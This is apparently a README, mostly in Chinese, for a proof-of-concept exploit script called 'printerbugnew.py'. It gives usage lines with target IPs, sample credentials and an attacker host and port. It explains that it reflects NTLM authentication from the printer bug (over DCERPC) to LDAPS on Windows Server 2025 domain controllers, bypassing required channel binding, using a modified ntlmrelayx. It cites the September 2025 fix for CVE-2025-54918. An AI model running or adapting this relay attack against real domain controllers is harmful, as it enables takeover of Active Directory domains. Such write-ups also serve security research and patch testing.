printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]
printerbugnew.py 192.168.1.100
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

这种通过反射实现的利用仅适用于 W2025 且使用“新”printerbug(DCERPC 而不是命名管道)的情况。
你需要对 ntlmrelayx 进行几处修改才能使其工作。之后,你可以在 W2025 域控上远程触发 printer bug,并通过 LDAPS(!) 反射认证,即使通道绑定(Channel Bindings)是必需的
ldaprelayclient.py:

rpcrelayserver.py
然后中继 ;)

该漏洞已在 2025 年 9 月补丁星期二修复:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918
该修复确保 MIC 始终被计算,即使 Type 3 消息为空也是如此。
感谢该 CVE 的作者提供了有价值的提示 :)